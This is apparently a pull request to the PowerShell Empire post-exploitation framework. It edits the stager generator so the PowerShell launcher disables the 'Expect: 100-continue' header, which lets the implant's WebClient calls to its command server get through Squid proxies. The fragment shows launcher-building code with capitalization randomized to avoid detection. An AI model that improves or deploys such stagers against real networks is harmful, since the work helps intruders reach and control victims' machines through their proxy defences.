### PR TITLE
417 Expectation failed error fix

### DIFF
--- a/lib/common/stagers.py
+++ b/lib/common/stagers.py
@@ -309,7 +309,9 @@ class Stagers:
         # get the launching URI
         URI = self.generate_launcher_uri(server, encode, pivotServer, hop)
 
-        stager = helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
+        # remove default Expect100Continue HTTP header (if exists, it causes squid proxy error)
+	stager = helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue = 0;")
+        stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
         stager += "$u='"+userAgent+"';"
 
         if "https" in URI:


### PR DESCRIPTION
Powershell Empire (.NET by default) uses a special HTTP/1.1 header (Expect: 100-continue) when doing a POST request, which is not happily supported by Squid 2.7 and above (more info https://alpacapowered.wordpress.com/2012/06/21/squid-expect-100-continue-header-issues/). Turn off the header.